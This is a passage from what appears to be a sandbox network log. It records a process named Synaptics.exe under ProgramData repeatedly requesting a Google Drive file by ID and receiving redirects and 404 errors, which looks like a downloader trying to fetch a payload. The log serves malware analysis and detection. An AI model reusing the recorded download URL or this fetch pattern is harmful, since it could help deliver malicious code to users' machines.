                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-cFJ0x-YPeC1h8s5nXPZLmQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                            Content-Length: 1652
                                                                                            Server: UploadServer
                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                            Content-Security-Policy: sandbox allow-scripts
                                                                                            Connection: close
2025-01-02 19:29:56 UTC | 147 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
2025-01-02 19:29:56 UTC | 1390 | IN | Data Ascii: t Found)!!1</title><style nonce="e4XHmMWCurIEh8jbwqqpnQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
2025-01-02 19:29:56 UTC | 115 | IN | Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
59 | 192.168.2.9 | 49997 | 172.217.18.14 | 443 | 7712 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-02 19:29:55 UTC | 344 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                            User-Agent: Synaptics.exe
                                                                                            Host: docs.google.com
                                                                                            Cache-Control: no-cache
                                                                                            Cookie: NID=520=hVlbUWvKAsXXeF2w1QNF8q5JgoN1tzf87ge04HU4z-izoj3_LDtGDRc8bxdZ01BsH-o2bzsVRFQ5r_WfhaVrhAteUAMZUwwIBUUg2Bex0dX01kJtDPaFFK0wIq1WKZ5eH2OJNc4egmV2sSWKiE-nh0MxGmLMyVzjQur-zpbgCqpOWYbRsspUiMg
2025-01-02 19:29:55 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                            Content-Type: application/binary
                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                            Pragma: no-cache
                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                            Date: Thu, 02 Jan 2025 19:29:55 GMT
                                                                                            Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                            Strict-Transport-Security: max-age=31536000
                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-NrXjg42GAlNoEv3u85DceQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                            Server: ESF
                                                                                            Content-Length: 0
                                                                                            X-XSS-Protection: 0
                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                            X-Content-Type-Options: nosniff
                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                            Connection: close


                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                            60 | 192.168.2.9 | 50002 | 172.217.18.14 | 443 | 7712 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                            2025-01-02 19:29:55 UTC | 344 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                            User-Agent: Synaptics.exe
                                                                                            Host: docs.google.com
                                                                                            Cache-Control: no-cache
                                                                                            Cookie: NID=520=hVlbUWvKAsXXeF2w1QNF8q5JgoN1tzf87ge04HU4z-izoj3_LDtGDRc8bxdZ01BsH-o2bzsVRFQ5r_WfhaVrhAteUAMZUwwIBUUg2Bex0dX01kJtDPaFFK0wIq1WKZ5eH2OJNc4egmV2sSWKiE-nh0MxGmLMyVzjQur-zpbgCqpOWYbRsspUiMg
                                                                                            2025-01-02 19:29:56 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                            Content-Type: application/binary
                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                            Pragma: no-cache
                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                            Date: Thu, 02 Jan 2025 19:29:56 GMT
                                                                                            Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                            Strict-Transport-Security: max-age=31536000
                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-UFbVF8UnWTwn1tby_1LulQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                            Server: ESF
                                                                                            Content-Length: 0
                                                                                            X-XSS-Protection: 0
                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                            X-Content-Type-Options: nosniff
                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                            Connection: close


                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                            61 | 192.168.2.9 | 50004 | 216.58.206.65 | 443 | 7712 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                            2025-01-02 19:29:55 UTC | 388 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                            User-Agent: Synaptics.exe
                                                                                            Cache-Control: no-cache
                                                                                            Host: drive.usercontent.google.com
                                                                                            Connection: Keep-Alive
                                                                                            Cookie: NID=520=noTK5C1N_8pMK2EAbDe9sYDQK0OhW8V4dVWlitjsrxccIBuMq836MtfyVMJ2hgZwpUBNKKh-JMOmXyhEu-Ds0HadWasjMMUHXVpDaNmHmfatkHKy8YeSNNMl2ka5wONCDDT6nDqRZqvMDdpWqG3Q4NfxAOEqL9KZJtXbiCD6fcAsyFjRpzbFZ0cs
                                                                                            2025-01-02 19:29:56 UTC | 1243 | IN | HTTP/1.1 404 Not Found
                                                                                            X-GUploader-UploadID: AFiumC5yipHIJRURjqsV3fqP1rVDuJ_E4E5DWPLypA59nBORL4LA0vBSetivf7zBLfrnWG_U
                                                                                            Content-Type: text/html; charset=utf-8
                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                            Pragma: no-cache
                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                            Date: Thu, 02 Jan 2025 19:29:56 GMT
                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-guCN7p2yyVA0nTNM9Emksw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                            Content-Length: 1652
                                                                                            Server: UploadServer
                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                            Content-Security-Policy: sandbox allow-scripts
                                                                                            Connection: close
                                                                                            2025-01-02 19:29:56 UTC | 147 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
                                                                                            2025-01-02 19:29:56 UTC | 1390 | IN | Data Ascii: t Found)!!1</title><style nonce="9Tyr-dxo-cBzp6fP6TjDlA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
                                                                                            2025-01-02 19:29:56 UTC | 115 | IN | Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                            62 | 192.168.2.9 | 50007 | 172.217.18.14 | 443 | 7712 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                            2025-01-02 19:29:56 UTC | 345 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                            User-Agent: Synaptics.exe
                                                                                            Host: docs.google.com
                                                                                            Cache-Control: no-cache
                                                                                            Cookie: NID=520=noTK5C1N_8pMK2EAbDe9sYDQK0OhW8V4dVWlitjsrxccIBuMq836MtfyVMJ2hgZwpUBNKKh-JMOmXyhEu-Ds0HadWasjMMUHXVpDaNmHmfatkHKy8YeSNNMl2ka5wONCDDT6nDqRZqvMDdpWqG3Q4NfxAOEqL9KZJtXbiCD6fcAsyFjRpzbFZ0cs
                                                                                            2025-01-02 19:29:57 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                            Content-Type: application/binary
                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                            Pragma: no-cache
                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                            Date: Thu, 02 Jan 2025 19:29:56 GMT
                                                                                            Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                            Strict-Transport-Security: max-age=31536000
                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-XzuJM5sw8cp6UpgurRQ1Sg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                            Server: ESF
                                                                                            Content-Length: 0
                                                                                            X-XSS-Protection: 0
                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                            X-Content-Type-Options: nosniff
                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                            Connection: close


                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                            63 | 192.168.2.9 | 50011 | 216.58.206.65 | 443 | 7712 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                            2025-01-02 19:29:56 UTC | 388 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                            User-Agent: Synaptics.exe
                                                                                            Cache-Control: no-cache
                                                                                            Host: drive.usercontent.google.com
                                                                                            Connection: Keep-Alive
                                                                                            Cookie: NID=520=noTK5C1N_8pMK2EAbDe9sYDQK0OhW8V4dVWlitjsrxccIBuMq836MtfyVMJ2hgZwpUBNKKh-JMOmXyhEu-Ds0HadWasjMMUHXVpDaNmHmfatkHKy8YeSNNMl2ka5wONCDDT6nDqRZqvMDdpWqG3Q4NfxAOEqL9KZJtXbiCD6fcAsyFjRpzbFZ0cs
                                                                                            2025-01-02 19:29:57 UTC | 1250 | IN | HTTP/1.1 404 Not Found
                                                                                            X-GUploader-UploadID: AFiumC5rpCmOp6GBLlIewz1sOC_4-LHCpJIBC8yDECOdolY20NdmiVshhQitqlaJHteAQ_hYrWP6QPY
                                                                                            Content-Type: text/html; charset=utf-8
                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                            Pragma: no-cache
                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                            Date: Thu, 02 Jan 2025 19:29:56 GMT
                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-JCBlBtjVnkQptvRrDkWd5w' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                            Content-Length: 1652
                                                                                            Server: UploadServer
                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                            Content-Security-Policy: sandbox allow-scripts
                                                                                            Connection: close
                                                                                            2025-01-02 19:29:57 UTC | 140 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
                                                                                            2025-01-02 19:29:57 UTC | 1390 | IN | Data Ascii: 404 (Not Found)!!1</title><style nonce="kfVBeSjy0dvT4Flj1fNhhA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
                                                                                            2025-01-02 19:29:57 UTC | 122 | IN | Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                            64 | 192.168.2.9 | 50012 | 172.217.18.14 | 443 | 7712 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                            2025-01-02 19:29:56 UTC | 345 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                            User-Agent: Synaptics.exe
                                                                                            Host: docs.google.com
                                                                                            Cache-Control: no-cache
                                                                                            Cookie: NID=520=noTK5C1N_8pMK2EAbDe9sYDQK0OhW8V4dVWlitjsrxccIBuMq836MtfyVMJ2hgZwpUBNKKh-JMOmXyhEu-Ds0HadWasjMMUHXVpDaNmHmfatkHKy8YeSNNMl2ka5wONCDDT6nDqRZqvMDdpWqG3Q4NfxAOEqL9KZJtXbiCD6fcAsyFjRpzbFZ0cs


                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                            65 | 192.168.2.9 | 50013 | 216.58.206.65 | 443 | 7712 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                            2025-01-02 19:29:57 UTC | 388 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                            User-Agent: Synaptics.exe
                                                                                            Cache-Control: no-cache
                                                                                            Host: drive.usercontent.google.com
                                                                                            Connection: Keep-Alive
                                                                                            Cookie: NID=520=noTK5C1N_8pMK2EAbDe9sYDQK0OhW8V4dVWlitjsrxccIBuMq836MtfyVMJ2hgZwpUBNKKh-JMOmXyhEu-Ds0HadWasjMMUHXVpDaNmHmfatkHKy8YeSNNMl2ka5wONCDDT6nDqRZqvMDdpWqG3Q4NfxAOEqL9KZJtXbiCD6fcAsyFjRpzbFZ0cs


                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                            66 | 192.168.2.9 | 50021 | 216.58.206.65 | 443 | 7712 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                            2025-01-02 19:29:57 UTC | 388 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                            User-Agent: Synaptics.exe
                                                                                            Cache-Control: no-cache
                                                                                            Host: drive.usercontent.google.com
                                                                                            Connection: Keep-Alive
                                                                                            Cookie: NID=520=noTK5C1N_8pMK2EAbDe9sYDQK0OhW8V4dVWlitjsrxccIBuMq836MtfyVMJ2hgZwpUBNKKh-JMOmXyhEu-Ds0HadWasjMMUHXVpDaNmHmfatkHKy8YeSNNMl2ka5wONCDDT6nDqRZqvMDdpWqG3Q4NfxAOEqL9KZJtXbiCD6fcAsyFjRpzbFZ0cs
                                                                                            2025-01-02 19:29:58 UTC | 1250 | IN | HTTP/1.1 404 Not Found
                                                                                            X-GUploader-UploadID: AFiumC5oP4QgKmgYUzZvf-JedWYTvOydVlb-stILsoGAXXeE0e2Uihcbci9OFgYcHHeBNisW4ATfltM
                                                                                            Content-Type: text/html; charset=utf-8
                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                            Pragma: no-cache
                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                            Date: Thu, 02 Jan 2025 19:29:58 GMT
                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-VR6ahjIG_wg5n4_iPIggVw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                            Content-Length: 1652
                                                                                            Server: UploadServer
                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                            Content-Security-Policy: sandbox allow-scripts
                                                                                            Connection: close
                                                                                            2025-01-02 19:29:58 UTC | 140 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
                                                                                            2025-01-02 19:29:58 UTC | 1390 | IN | Data Ascii: 404 (Not Found)!!1</title><style nonce="0tS8m7r2Udpl0dKt5niGzg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
                                                                                            2025-01-02 19:29:58 UTC | 122 | IN | Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                            67 | 192.168.2.9 | 50023 | 172.217.18.14 | 443 | 7712 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                            2025-01-02 19:29:57 UTC | 345 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                            User-Agent: Synaptics.exe
                                                                                            Host: docs.google.com
                                                                                            Cache-Control: no-cache
                                                                                            Cookie: NID=520=noTK5C1N_8pMK2EAbDe9sYDQK0OhW8V4dVWlitjsrxccIBuMq836MtfyVMJ2hgZwpUBNKKh-JMOmXyhEu-Ds0HadWasjMMUHXVpDaNmHmfatkHKy8YeSNNMl2ka5wONCDDT6nDqRZqvMDdpWqG3Q4NfxAOEqL9KZJtXbiCD6fcAsyFjRpzbFZ0cs
                                                                                            2025-01-02 19:29:58 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                            Content-Type: application/binary
                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                            Pragma: no-cache
                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                            Date: Thu, 02 Jan 2025 19:29:58 GMT
                                                                                            Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                            Strict-Transport-Security: max-age=31536000
                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-miKmRRd7eRUCjbtlQqU9_g' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                            Server: ESF
                                                                                            Content-Length: 0
                                                                                            X-XSS-Protection: 0
                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                            X-Content-Type-Options: nosniff
                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                            Connection: close


                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                            68 | 192.168.2.9 | 50022 | 172.217.18.14 | 443 | 7712 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                            2025-01-02 19:29:57 UTC | 345 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                            User-Agent: Synaptics.exe
                                                                                            Host: docs.google.com
                                                                                            Cache-Control: no-cache
                                                                                            Cookie: NID=520=noTK5C1N_8pMK2EAbDe9sYDQK0OhW8V4dVWlitjsrxccIBuMq836MtfyVMJ2hgZwpUBNKKh-JMOmXyhEu-Ds0HadWasjMMUHXVpDaNmHmfatkHKy8YeSNNMl2ka5wONCDDT6nDqRZqvMDdpWqG3Q4NfxAOEqL9KZJtXbiCD6fcAsyFjRpzbFZ0cs
                                                                                            2025-01-02 19:29:58 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                            Content-Type: application/binary
                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                            Pragma: no-cache
                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                            Date: Thu, 02 Jan 2025 19:29:58 GMT
                                                                                            Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                            Strict-Transport-Security: max-age=31536000
                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-b5XRzgwfEvg3NBzDJchA5A' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                            Server: ESF
                                                                                            Content-Length: 0
                                                                                            X-XSS-Protection: 0
                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                            X-Content-Type-Options: nosniff
                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                            Connection: close


                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                            69 | 192.168.2.9 | 50032 | 216.58.206.65 | 443 | 7712 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                            2025-01-02 19:29:58 UTC | 388 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                            User-Agent: Synaptics.exe
                                                                                            Cache-Control: no-cache
                                                                                            Host: drive.usercontent.google.com
                                                                                            Connection: Keep-Alive
                                                                                            Cookie: NID=520=noTK5C1N_8pMK2EAbDe9sYDQK0OhW8V4dVWlitjsrxccIBuMq836MtfyVMJ2hgZwpUBNKKh-JMOmXyhEu-Ds0HadWasjMMUHXVpDaNmHmfatkHKy8YeSNNMl2ka5wONCDDT6nDqRZqvMDdpWqG3Q4NfxAOEqL9KZJtXbiCD6fcAsyFjRpzbFZ0cs
                                                                                            2025-01-02 19:29:59 UTC | 1250 | IN | HTTP/1.1 404 Not Found
                                                                                            X-GUploader-UploadID: AFiumC7zKI6lHdmOUVGkvMYX1JFhOAHlFegcAy3EygHYlNcej5U4I5caa-rekDNPjZ0urTxn6iDkSi0
                                                                                            Content-Type: text/html; charset=utf-8
                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                            Pragma: no-cache
                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                            Date: Thu, 02 Jan 2025 19:29:59 GMT
                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-1XR6IPdPjRdXm-ERuWzgvQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                            Content-Length: 1652
                                                                                            Server: UploadServer
                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                            Content-Security-Policy: sandbox allow-scripts
                                                                                            Connection: close
